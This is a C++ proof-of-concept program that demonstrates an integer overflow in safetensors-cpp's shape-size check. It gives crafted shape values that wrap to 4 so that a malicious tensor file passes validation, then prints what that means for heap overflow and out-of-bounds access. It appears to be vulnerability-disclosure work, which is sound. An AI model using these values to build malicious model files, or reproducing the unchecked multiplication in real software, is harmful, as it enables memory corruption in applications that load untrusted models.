File size: 6,128 Bytes
4c19aea
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
/**
 * test_overflow.cc - Demonstrates integer overflow vulnerability in safetensors-cpp
 *
 * This program loads a malicious .safetensors file where shape dimensions
 * are crafted to overflow uint64 multiplication in get_shape_size().
 *
 * The file passes safetensors-cpp validation because:
 *   shape = [4194305, 4194305, 211106198978564]
 *   get_shape_size() = 4194305 * 4194305 * 211106198978564 (overflows to 4)
 *   tensor_size = 4 * sizeof(F32) = 16 bytes
 *   data_offsets = [0, 16] -> data_size = 16 bytes
 *   tensor_size == data_size -> VALIDATION PASSES
 *
 * But the declared shape claims ~3.7 * 10^27 elements.
 *
 * IMPACT: Any code that trusts the shape for buffer allocation or iteration
 * will either:
 *   (a) Attempt a massive allocation (DoS / OOM)
 *   (b) If they also overflow, allocate a tiny buffer and write OOB (heap overflow)
 *   (c) Iterate over wrong number of elements, causing OOB reads
 *
 * Compile: g++ -std=c++17 -I safetensors-cpp -o test_overflow test_overflow.cc
 */

#include <cstdio>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <fstream>
#include <vector>
#include <iostream>
#include <limits>

#include "safetensors.hh"

int main(int argc, char *argv[]) {
    const char *filepath = "overflow_tensor.safetensors";
    if (argc > 1) {
        filepath = argv[1];
    }

    printf("=== safetensors-cpp Integer Overflow PoC ===\n\n");

    // Read file into memory
    std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
    if (!ifs.is_open()) {
        fprintf(stderr, "Failed to open %s\n", filepath);
        return 1;
    }
    size_t filesize = ifs.tellg();
    ifs.seekg(0);
    std::vector<uint8_t> data(filesize);
    ifs.read(reinterpret_cast<char*>(data.data()), filesize);
    ifs.close();

    printf("[*] Loaded file: %s (%zu bytes)\n", filepath, filesize);

    // Parse with safetensors-cpp
    safetensors::safetensors_t st;
    std::string warn, err;

    bool ok = safetensors::load_from_memory(data.data(), data.size(),
                                             filepath, &st, &warn, &err);

    if (!ok) {
        printf("[!] load_from_memory FAILED: %s\n", err.c_str());
        return 1;
    }

    if (!warn.empty()) {
        printf("[!] Warnings: %s\n", warn.c_str());
    }

    printf("[+] load_from_memory SUCCEEDED (file parsed without error)\n\n");

    // Validate data offsets (this is the check that should catch overflow)
    std::string val_err;
    bool valid = safetensors::validate_data_offsets(st, val_err);
    printf("[*] validate_data_offsets: %s\n", valid ? "PASSED" : "FAILED");
    if (!valid) {
        printf("    Error: %s\n", val_err.c_str());
    }

    // Examine the tensor
    for (size_t i = 0; i < st.tensors.size(); i++) {
        std::string key = st.tensors.keys()[i];
        safetensors::tensor_t tensor;
        st.tensors.at(i, &tensor);

        printf("\n[*] Tensor: '%s'\n", key.c_str());
        printf("    dtype: F32\n");
        printf("    shape: [");
        for (size_t j = 0; j < tensor.shape.size(); j++) {
            if (j > 0) printf(", ");
            printf("%zu", tensor.shape[j]);
        }
        printf("]\n");
        printf("    data_offsets: [%zu, %zu]\n", tensor.data_offsets[0], tensor.data_offsets[1]);

        // Show the overflow
        size_t shape_size = safetensors::get_shape_size(tensor);
        size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);
        size_t tensor_size = dtype_bytes * shape_size;

        printf("\n    [OVERFLOW ANALYSIS]\n");
        printf("    get_shape_size() = %zu  (OVERFLOWED! True value: ~3.7e27)\n", shape_size);
        printf("    get_dtype_bytes() = %zu\n", dtype_bytes);
        printf("    tensor_size = %zu * %zu = %zu\n", dtype_bytes, shape_size, tensor_size);
        printf("    data_size = %zu\n", tensor.data_offsets[1] - tensor.data_offsets[0]);
        printf("    tensor_size == data_size? %s\n",
               tensor_size == (tensor.data_offsets[1] - tensor.data_offsets[0]) ? "YES (validation passes!)" : "NO");

        // Demonstrate the danger: a naive consumer trusting shape
        printf("\n    [IMPACT DEMONSTRATION]\n");
        printf("    A consumer that trusts shape dimensions would compute:\n");
        printf("    shape[0] * shape[1] * shape[2] = ");

        // Use __int128 or manual check to show the true product
        __uint128_t true_product = (__uint128_t)tensor.shape[0] * tensor.shape[1] * tensor.shape[2];
        printf("OVERFLOW (too large for uint64)\n");
        printf("    True product > UINT64_MAX: %s\n",
               true_product > ((__uint128_t)UINT64_MAX) ? "YES" : "NO");

        // Simulate what a consumer would do
        printf("\n    [SIMULATED CONSUMER BEHAVIOR]\n");

        // Scenario 1: Consumer uses shape for allocation (overflows to small buffer)
        size_t alloc_size = 1;
        for (size_t j = 0; j < tensor.shape.size(); j++) {
            alloc_size *= tensor.shape[j];  // Same overflow!
        }
        alloc_size *= dtype_bytes;
        printf("    Consumer alloc (overflowed): %zu bytes (tiny!)\n", alloc_size);
        printf("    Consumer thinks tensor has: %zu * %zu * %zu = ~3.7e27 elements\n",
               tensor.shape[0], tensor.shape[1], tensor.shape[2]);

        // Show it: allocate the overflowed-size buffer, then show what happens
        // when iterating over shape dimensions
        printf("\n    If consumer allocates %zu bytes but iterates shape[0]*shape[1]*shape[2] times:\n", alloc_size);
        printf("    -> HEAP BUFFER OVERFLOW (writing ~3.7e27 * 4 bytes into %zu byte buffer)\n", alloc_size);
        printf("    This is a critical memory safety vulnerability.\n");
    }

    printf("\n=== DIFFERENTIAL RESULT ===\n");
    printf("  Rust (reference): REJECTS file with SafeTensorError::ValidationOverflow\n");
    printf("  C++ (safetensors-cpp): ACCEPTS file, validation passes\n");
    printf("  Impact: A model file that Rust deems invalid is accepted by C++\n");
    printf("          The shape values cause integer overflow, enabling heap corruption\n");

    return 0;
}